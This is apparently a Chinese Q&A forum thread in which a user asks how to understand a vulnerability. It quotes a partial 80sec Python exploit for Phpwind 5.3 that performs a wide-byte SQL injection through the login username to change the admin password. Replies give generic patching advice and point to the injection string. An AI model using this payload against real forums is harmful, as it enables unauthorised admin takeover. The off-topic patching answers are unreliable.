请问漏洞该怎么看

来源:百度知道 编辑:UC知道 时间:2024/09/21 23:34:21
甚至不用注册账户,只要精心构造username即可利用此漏洞。

漏洞利用:80sec提供exploit如下:

import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
argvs=sys.argv

data = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*&pwpwd=123456〃
pwurl = “%s” % argvs[1]
pwurl = pwurl + “wap/index.php”

print “\r\n\r\nPhpwind Admin Pass Change Exploit”
print “Phpwind <=5.3 "
print "By 80sec "
print "python.exe "+argvs[0]+" http://www.80sec.com/pwforum/ 1\r\n"

print "\r\n[+]TargetForum: "+argvs[1]
print "[+]TargetId: "+argvs[2]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type

下个360看,

支持原创,回答开始:
LZ说的代码我也不明白,但是我想给以下建议:
1。可以下载一些打补丁的软件。比如:360,超级兔子
2。如果你是vista的系统,在控制面板里有“检查更新”,经常检查并下载。

360和超级兔子的优劣:
360公认的打补丁的好软件,但是补丁下载速度较慢。超级兔子下载速度快。
360和超级兔子有时会找到不同的补丁(即只有一个监测到),所以建议两个都装,但是不要重复的打,会造成错乱。

回答完毕,请指示!

用360安全卫士修补吧

用膏药贴住

用杀毒软件修补!

这是用的SQL注入,关键看这里
pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*